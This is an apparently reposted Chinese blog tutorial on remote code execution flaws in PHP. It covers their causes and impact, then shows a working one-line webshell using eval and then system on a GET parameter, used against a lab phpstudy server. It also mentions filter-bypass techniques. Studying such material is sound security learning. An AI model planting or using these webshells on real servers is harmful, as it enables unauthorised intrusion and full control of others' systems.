当前位置: 首页 > article >正文

RCE漏洞

本文仅作为学习参考使用,本文作者对任何使用本文进行渗透攻击破坏不负任何责任。

一,漏洞简介。

1,概述。

RCE漏洞的核心在于应用程序未能正确验证用户输入(又称为命令执行漏洞),或者在处理敏感操作时未能进行严格的权限控制。当Web应用或API接受用户输入并在后端处理时,如果未经充分过滤或转义就将其作为命令或脚本的一部分执行,攻击者就能通过精心构造的输入插入恶意代码,实现远程代码执行。

2,漏洞危害。

RCE漏洞的危害极大,一旦被攻击者利用,可能导致以下严重后果:

执行任意系统命令:攻击者可以在受感染的系统上执行任意操作系统命令,如创建、修改或删除文件、文件夹和用户帐户等。
远程访问及控制:攻击者可以获取对目标系统的远程访问权限,并完全控制该系统。这使得攻击者可以操纵系统设置、访问敏感数据、安装后门或进行其他恶意活动。
数据泄露:攻击者可能通过执行恶意代码来窃取敏感数据,如数据库凭据、用户信息、登录凭证等。

3,漏洞存在的前提条件。

1、开发人员调用了能够执行系统命令的函数。

2、这个函数的参数可控(即用户能够控制)。

3、开发人员没有对该函数的参数进行过滤或过滤不严。

二,漏洞利用。

一句话木马利用的就是RCE漏洞,利用过程与一句话木马利用过程极其相似,可直接使用webshell工具进行连接。

例如:

<?php 
$x=$_GET['pass'];
eval($x);
?>

假设我们通过任何手段,将内含有一句话木马的a.php文件上传到一个使用phpstudy搭建的网站上。

成功访问。

打开hackbar输入:

http://192.168.224.206:8008/a.php?pass=echo 'test';

成功。

若想进行更进一步操作,例如查看当前服务器ip:

可以看到失败了,对于此,我们需要更高级别的权限,更改一句话木马为:

<?php 
$x=$_GET['pass'];
system($x);
?>

此处调用了system函数来进行更高权限的操作。

将其上传到服务器后可以发现:

成功执行。

查看其他命令是否可以执行:

例如查看当前用户:

输出内容为乱码,尝试其他命令:

dir:列出当前目录下的文件和文件夹。

可以看到,phpstudy的根目录在F盘内。

三,实战使用技巧。

RCE漏洞存在就是因为此网站使用或调用了system,exec,shell_exec,passthru等执行系统命令的函数;同时,编写的代码不严谨,开发人员没有对该函数的参数进行过滤或过滤不严;并且用户可以控制此函数的参数。

在实战中,可以使用一些常见的绕过技巧例如通配符;转义符号,编码等方式进行绕过。


http://www.kler.cn/a/288723.html

相关文章:

  • 使用etl工具kettle的日常踩坑梳理之二、从Hadoop中导出数据
  • WebGIS三维地图框架--Cesium
  • ArkTs简单入门案例:简单的图片切换应用界面
  • C#文字识别API场景解析、表格识别提取
  • 【前端】Vue中如何避免出现内存泄漏
  • 【C++】类与对象的基础概念
  • Vue 3 中如何对接高德地图
  • goreplay流量重放备忘
  • sqlite3的db.serialize方法:确保数据库操作串行化的利器
  • Autosar OS基础知识导图
  • 根据xml模板导出excel
  • Gitee镜像关联GitHub仓库
  • 【MySQL-24】万字全面解析<索引>——【介绍&语法&性能分析&使用规则】
  • 数据库:实验六存储过程
  • websocket:两台PC间数据传输
  • Leetcode 146. LRU 缓存(Medium)
  • 【知识库系列】MPR/多模态方向观察:图像视频与3D生成
  • 你的专利真的值钱吗?五重标准检验,让你的创新价值飙升
  • 深度学习:革新药物心脏毒性预测的新篇章
  • 局域网通信时,解决在一些设备上NsdManager发现服务失败的问题
  • 9_3_LineEdit
  • 抓取海外电商平台数据时,是否最好使用当地的IP?
  • 基础闯关4
  • 数学建模常用工具总结
  • 关于Linux(CentOS 7)中的用户sudo命令
  • 知识付费小程序搭建:开启知识变现新时代